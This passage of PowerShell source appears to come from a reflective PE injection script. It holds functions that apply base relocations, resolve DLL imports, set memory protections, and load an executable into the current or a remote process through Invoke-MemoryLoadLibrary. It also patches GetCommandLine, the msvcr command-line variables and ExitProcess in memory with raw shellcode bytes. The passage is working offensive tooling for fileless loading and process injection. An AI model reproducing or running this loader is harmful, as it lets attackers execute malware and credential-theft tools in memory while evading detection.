([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress)) while($true) { #If SizeOfBlock == 0, we are done $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION) if ($BaseRelocationTable.SizeOfBlock -eq 0) { break } [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress)) $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2 #Loop through each relocation for($i = 0; $i -lt $NumRelocations; $i++) { #Get info for this relocation $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i))) [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16]) #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF [UInt16]$RelocType = $RelocationInfo -band 0xF000 for ($j = 0; $j -lt 12; $j++) { $RelocType = [Math]::Floor($RelocType / 2) } #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit. #This appears to be true for EXE's as well. # Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) ` -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64)) { #Get the current memory address and update it based off the difference between PE expected base address and actual base address [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset)) [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr]) if ($AddDifference -eq $true) { [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) } else { [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) } [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null } elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE) { #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo" } } $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock)) } } Function Import-DllImports { Param( [Parameter(Position = 0, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Types, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Constants, [Parameter(Position = 4, Mandatory = $false)] [IntPtr] $RemoteProcHandle ) $RemoteLoading = $false if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle) { $RemoteLoading = $true } if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) { [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) while ($true) { $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR) #If the structure is null, it signals that this is the end of the array if ($ImportDescriptor.Characteristics -eq 0 ` -and $ImportDescriptor.FirstThunk -eq 0 ` -and $ImportDescriptor.ForwarderChain -eq 0 ` -and $ImportDescriptor.Name -eq 0 ` -and $ImportDescriptor.TimeDateStamp -eq 0) { Write-Verbose "Done importing DLL imports" break } $ImportDllHandle = [IntPtr]::Zero $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)) $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) if ($RemoteLoading -eq $true) { $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr } else { $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath) } if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero)) { throw "Error importing DLL, DLLName: $ImportDllPath" } #Get the first thunk, then loop through all of them [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk) [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr]) while ($OriginalThunkRefVal -ne [IntPtr]::Zero) { $LoadByOrdinal = $false [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit # If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint # and doing the comparison, just see if it is less than 0 [IntPtr]$NewThunkRef = [IntPtr]::Zero if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0) { [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal $LoadByOrdinal = $true } elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0) { [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal $LoadByOrdinal = $true } else { [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal) $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])) $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr) $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName) } if ($RemoteLoading -eq $true) { [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal } else { [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr) } if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero) { if ($LoadByOrdinal) { Throw "New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath" } else { Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath" } } [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false) $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])) [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])) [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr]) #Cleanup #If loading by ordinal, ProcedureNamePtr is the ordinal value and not actually a pointer to a buffer that needs to be freed if ((-not $LoadByOrdinal) -and ($ProcedureNamePtr -ne [IntPtr]::Zero)) { [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr) $ProcedureNamePtr = [IntPtr]::Zero } } $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)) } } } Function Get-VirtualProtectValue { Param( [Parameter(Position = 0, Mandatory = $true)] [UInt32] $SectionCharacteristics ) $ProtectionFlag = 0x0 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0) { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) { $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE } else { $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ } } else { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) { $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY } else { $ProtectionFlag = $Win32Constants.PAGE_EXECUTE } } } else { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) { $ProtectionFlag = $Win32Constants.PAGE_READWRITE } else { $ProtectionFlag = $Win32Constants.PAGE_READONLY } } else { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) { $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY } else { $ProtectionFlag = $Win32Constants.PAGE_NOACCESS } } } if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0) { $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE } return $ProtectionFlag } Function Update-MemoryProtectionFlags { Param( [Parameter(Position = 0, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Types ) for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) { [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress) [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics [UInt32]$SectionSize = $SectionHeader.VirtualSize [UInt32]$OldProtectFlag = 0 Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag) if ($Success -eq $false) { Throw "Unable to change memory protection" } } } #This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE #Returns an object with addresses to copies of the bytes that were overwritten (and the count) Function Update-ExeFunctions { Param( [Parameter(Position = 0, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants, [Parameter(Position = 3, Mandatory = $true)] [String] $ExeArguments, [Parameter(Position = 4, Mandatory = $true)] [IntPtr] $ExeDoneBytePtr ) #This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state. $ReturnArray = @() $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) [UInt32]$OldProtectFlag = 0 [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll") if ($Kernel32Handle -eq [IntPtr]::Zero) { throw "Kernel32 handle null" } [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll") if ($KernelBaseHandle -eq [IntPtr]::Zero) { throw "KernelBase handle null" } ################################################# #First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it. # We overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want. $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA") [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW") if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero) { throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)" } #Prepare the shellcode [Byte[]]$Shellcode1 = @() if ($PtrSize -eq 8) { $Shellcode1 += 0x48 #64bit shellcode has the 0x48 before the 0xb8 } $Shellcode1 += 0xb8 [Byte[]]$Shellcode2 = @(0xc3) $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length #Make copy of GetCommandLineA and GetCommandLineW $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize) $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize) #Overwrite GetCommandLineA [UInt32]$OldProtectFlag = 0 $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) if ($Success = $false) { throw "Call to VirtualProtect failed" } $GetCommandLineAAddrTemp = $GetCommandLineAAddr Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false) $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null #Overwrite GetCommandLineW [UInt32]$OldProtectFlag = 0 $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) if ($Success = $false) { throw "Call to VirtualProtect failed" } $GetCommandLineWAddrTemp = $GetCommandLineWAddr Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false) $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null ################################################# ################################################# #For C++ stuff that is compiled with visual studio as "multithreaded DLL", the above method of overwriting GetCommandLine doesn't work. # I don't know why exactly.. But the msvcr DLL that a "DLL compiled executable" imports has an export called _acmdln and _wcmdln. # It appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the # argv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported. $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" ` , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll") foreach ($Dll in $DllList) { [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll) if ($DllHandle -ne [IntPtr]::Zero) { [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln") [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln") if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero) { "Error, couldn't find _wcmdln or _acmdln" } $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) #Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr]) $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr]) $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false) [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false) $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize) $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize) $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) if ($Success = $false) { throw "Call to VirtualProtect failed" } [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false) $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) if ($Success = $false) { throw "Call to VirtualProtect failed" } [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false) $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null } } ################################################# ################################################# #Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits. $ReturnArray = @() $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process #CorExitProcess (compiled in to visual studio c++) [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll") if ($MscoreeHandle -eq [IntPtr]::Zero) { throw "mscoree handle null" } [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess") if ($CorExitProcessAddr -eq [IntPtr]::Zero) { Throw "CorExitProcess address not found" } $ExitFunctions += $CorExitProcessAddr #ExitProcess (what non-managed programs use) [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess") if ($ExitProcessAddr -eq [IntPtr]::Zero) { Throw "ExitProcess address not found" } $ExitFunctions += $ExitProcessAddr [UInt32]$OldProtectFlag = 0 foreach ($ProcExitFunctionAddr in $ExitFunctions) { $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr #The following is the shellcode (Shellcode: ExitThread.asm): #32bit shellcode [Byte[]]$Shellcode1 = @(0xbb) [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb) #64bit shellcode (Shellcode: ExitThread.asm) if ($PtrSize -eq 8) { [Byte[]]$Shellcode1 = @(0x48, 0xbb) [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb) } [Byte[]]$Shellcode3 = @(0xff, 0xd3) $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread") if ($ExitThreadAddr -eq [IntPtr]::Zero) { Throw "ExitThread address not found" } $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) if ($Success -eq $false) { Throw "Call to VirtualProtect failed" } #Make copy of original ExitProcess bytes $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize) #Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then # call ExitThread Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false) $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false) $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null } ################################################# Write-Output $ReturnArray } #This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count) # It copies Count bytes from Source to Destination. Function Copy-ArrayOfMemAddresses { Param( [Parameter(Position = 0, Mandatory = $true)] [Array[]] $CopyInfo, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants ) [UInt32]$OldProtectFlag = 0 foreach ($Info in $CopyInfo) { $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) if ($Success -eq $false) { Throw "Call to VirtualProtect failed" } $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null } } ##################################### ########## FUNCTIONS ########### ##################################### Function Get-MemoryProcAddress { Param( [Parameter(Position = 0, Mandatory = $true)] [IntPtr] $PEHandle, [Parameter(Position = 1, Mandatory = $true)] [String] $FunctionName ) $Win32Types = Get-Win32Types $Win32Constants = Get-Win32Constants $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants #Get the export table if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0) { return [IntPtr]::Zero } $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress) $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY) for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++) { #AddressOfNames is an array of pointers to strings of the names of the functions exported $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))) $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32])) $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr) if ($Name -ceq $FunctionName) { #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions # which contains the offset of the function in to the DLL $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))) $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16]) $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32]))) $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32]) return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset) } } return [IntPtr]::Zero } Function Invoke-MemoryLoadLibrary { Param( [Parameter( Position = 0, Mandatory = $true )] [Byte[]] $PEBytes, [Parameter(Position = 1, Mandatory = $false)] [String] $ExeArgs, [Parameter(Position = 2, Mandatory = $false)] [IntPtr] $RemoteProcHandle, [Parameter(Position = 3)] [Bool] $ForceASLR = $false ) $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) #Get Win32 constants and functions $Win32Constants = Get-Win32Constants $Win32Functions = Get-Win32Functions $Win32Types = Get-Win32Types $RemoteLoading = $false if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero)) { $RemoteLoading = $true } #Get basic PE information Write-Verbose "Getting basic PE information from the file" $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types $OriginalImageBase = $PEInfo.OriginalImageBase $NXCompatible = $true if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) { Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue $NXCompatible = $false } #Verify that the PE and the current process are the same bits (32bit or 64bit) $Process64Bit = $true if ($RemoteLoading -eq $true) { $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process") if ($Result -eq [IntPtr]::Zero) { Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit" } [Bool]$Wow64Process = $false $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process) if ($Success -eq $false) { Throw "Call to IsWow64Process failed" } if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4))) { $Process64Bit = $false } #PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly $PowerShell64Bit = $true if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8) { $PowerShell64Bit = $false } if ($PowerShell64Bit -ne $Process64Bit) { throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process" } } else { if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8) { $Process64Bit = $false } } if ($Process64Bit -ne $PEInfo.PE64Bit) { Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)" } #Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address Write-Verbose "Allocating memory for the PE and write its headers to memory" #ASLR check [IntPtr]$LoadAddr = [IntPtr]::Zero $PESupportsASLR = ($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq 